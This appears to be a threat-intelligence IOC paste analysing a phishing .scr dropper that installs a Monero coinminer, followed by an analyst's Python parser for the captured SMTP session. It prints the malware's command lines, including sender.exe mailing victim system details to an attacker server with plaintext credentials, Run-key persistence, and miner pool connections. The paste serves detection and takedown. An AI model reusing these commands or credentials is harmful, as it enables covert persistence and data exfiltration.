#IOC #OptiData #VR #coinminer #bmcon #SCR
https://pastebin.com/eTPuCkhC
previous contact:
https://pastebin.com/ELpZTc1y
attack_vector
--------------
email attach > SCR > C:\Intel\*
email_headers
--------------
n/a
files
--------------
SHA-256 fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, vd4,]
File size 735.93 KB
SHA-256 5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 793.76 KB
SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name bmcon.exe [Intel 80386, for MS Windows, UPX compressed]
File size 354.5 KB (363008 bytes)
SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
File name sender.exe [Intel 80386, for MS Windows]
File size 220 KB (225280 bytes)
SHA-256 b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
File name bm-xmrig.exe [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
File size 750.5 KB (768512 bytes)
activity
**************
SEND SMTP_587
--------------
220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
EHLO apm11
250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@account-identification.site>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Tue, 19 Mar 2019 14:39:17 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@account-identification.site
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
Subject: PC-APM11/User-support
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset="UTF-8"
OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
PU-...................... VGA ...................... ..............
.
250 OK id=1h6ccp-002kK0-KG
QUIT
221 vserver321.axc.nl closing connection
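The session above was sent in the clear on port 587 without STARTTLS, so everything the dropper's mailer used is recoverable from the capture: the SASL PLAIN blob is just base64 of `authzid NUL authcid NUL password`, and decoding it gives the same account and password that sender.exe receives on its command line in the proc section. The parser below is an added analyst helper, not part of the paste or of any tool it names; it takes the transcript (copied here with the folded Content-Type line indented as it is on the wire) and pulls out the relay host, HELO name, decoded credentials, envelope addresses, headers and Exim queue id, which is what you would hand to the mail provider for takedown and to your own mail gateway for blocking.

```python
"""Extract analyst-relevant fields from a captured plaintext SMTP session."""
import base64
import re

# Transcript copied from the capture above (client and server lines interleaved).
CAPTURE = """\
220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
EHLO apm11
250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@account-identification.site>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Tue, 19 Mar 2019 14:39:17 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@account-identification.site
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
Subject: PC-APM11/User-support
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
 charset="UTF-8"
OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
PU-...................... VGA ...................... ..............
.
250 OK id=1h6ccp-002kK0-KG
QUIT
221 vserver321.axc.nl closing connection
"""

SERVER_REPLY = re.compile(r"^(\d{3})([ -])(.*)$")   # "250 OK" / "250-SIZE ..."
HEADER = re.compile(r"^([\w-]+):\s*(.*)$")          # "Name: value"
ANGLE_ADDR = re.compile(r"<([^>]*)>")


def decode_sasl_plain(blob):
    """SASL PLAIN initial response: base64(authzid NUL authcid NUL password)."""
    parts = base64.b64decode(blob).split(b"\x00")
    if len(parts) != 3:
        raise ValueError("not a SASL PLAIN message")
    authzid, authcid, password = (p.decode("utf-8", "replace") for p in parts)
    return {"authzid": authzid, "authcid": authcid, "password": password}


def parse_smtp_session(capture):
    """Walk the transcript as a small state machine: commands -> headers -> body."""
    info = {"server": None, "ehlo": None, "auth": None, "mail_from": None,
            "rcpt_to": [], "headers": {}, "body": [], "queue_id": None}
    state, last_header = "commands", None
    for line in capture.splitlines():
        if state == "commands":
            m = SERVER_REPLY.match(line)
            if m:                                   # server side
                code, text = m.group(1), m.group(3)
                if code == "220" and info["server"] is None:
                    info["server"] = text.split()[0]
                elif code == "250" and "id=" in text:   # Exim's post-DATA ack
                    info["queue_id"] = text.split("id=", 1)[1].split()[0]
                continue
            verb, _, arg = line.partition(" ")      # client side
            verb = verb.upper()
            if verb in ("EHLO", "HELO"):
                info["ehlo"] = arg.strip()
            elif verb == "AUTH" and arg.upper().startswith("PLAIN "):
                info["auth"] = decode_sasl_plain(arg.split(None, 1)[1])
            elif verb == "MAIL":
                info["mail_from"] = ANGLE_ADDR.search(arg).group(1)
            elif verb == "RCPT":
                info["rcpt_to"].append(ANGLE_ADDR.search(arg).group(1))
            elif verb == "DATA":
                state = "headers"
        elif state == "headers":
            if line.startswith("354"):              # server go-ahead, not message data
                continue
            if line[:1] in (" ", "\t") and last_header:   # folded continuation
                info["headers"][last_header] += " " + line.strip()
                continue
            m = HEADER.match(line)
            if m:
                last_header = m.group(1)
                info["headers"][last_header] = m.group(2)
            else:                                   # first non-header line: body
                state = "body"
                info["body"].append(line)
        elif state == "body":
            if line == ".":                         # end-of-data marker
                state = "commands"
            else:
                info["body"].append(line)
    return info


if __name__ == "__main__":
    for key, value in parse_smtp_session(CAPTURE).items():
        print(f"{key}: {value}")
```

The decoded `authcid`/`password` pair should match the `-u`/`-pw` arguments of the sender.exe command line in the proc section; when the two disagree, the capture and the process listing come from different runs of the sample and should be triaged separately.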
netwrk
--------------
http
93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.122 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.114 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/t... HTTP/1.1 Microsoft-CryptoAPI/6.1
178.18.231.121 crl.microsoft.com GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
ssl
88.99.38.225 dl.browsermine.com Client Hello
comp
--------------
bmcon.exe 3064 TCP localhost 49518 88.99.38.225 443 ESTABLISHED
bmcon.exe 3064 TCP localhost 49519 93.184.221.240 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49520 178.18.231.122 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49521 178.18.231.114 80 ESTABLISHED
bmcon.exe 3064 TCP localhost 49522 88.99.38.225 443 ESTABLISHED
bm-xmrig.exe 1776 TCP localhost 49524 159.69.189.115 4444 ESTABLISHED
svchost.exe 244 TCP localhost 49525 93.184.221.240 80 ESTABLISHED
svchost.exe 244 TCP localhost 49526 178.18.231.121 80 ESTABLISHED
proc
--------------
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -h off
C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel\bmcon
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
C:\Intel\sender.exe -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"
C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
C:\Windows\SysWOW64\PING.EXE ping -n 300 127.0.0.1
C:\Intel\bmcon.exe
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
"C:\Intel\bmcon\bm-xmrig.exe"
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.03.2019 14:39
#1 BMCon c:\intel\bmcon.exe 03.11.2018 2:42
#2 private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
c:\intel\private.exe 20.06.1992 0:22
drop
--------------
C:\Intel\GfxUI.exe.config
C:\Intel\IGFXDEVLib.dll
C:\Intel\iglhxa32.vp
C:\Intel\Impcd.cat
C:\Intel\IntcDAuC.dll
C:\Intel\mup.xml
C:\Intel\private.exe
C:\Intel\readme-VGA.txt
C:\Intel\sender.exe
C:\Intel\Setup2.if2
C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json
C:\Intel\bmcon\bm-xmrig-amd.exe
C:\Intel\bmcon\bm-xmrig-amd.json
C:\Intel\bmcon\bm-xmrig-nvidia.exe
C:\Intel\bmcon\bm-xmrig-nvidia.json
C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
C:\Intel\bmcon\bm-xmrig-x32.exe
C:\Intel\bmcon\nvrtc64_80.dll
C:\Intel\bmcon\nvrtc64_100_0.dll
C:\Intel\bmcon\nvrtc-builtins64_80.dll
C:\Intel\bmcon\nvrtc-builtins64_100.dll
C:\Intel\bmcon.exe
C:\Intel\bmcon.json
# # #
https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde
https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details
VR
@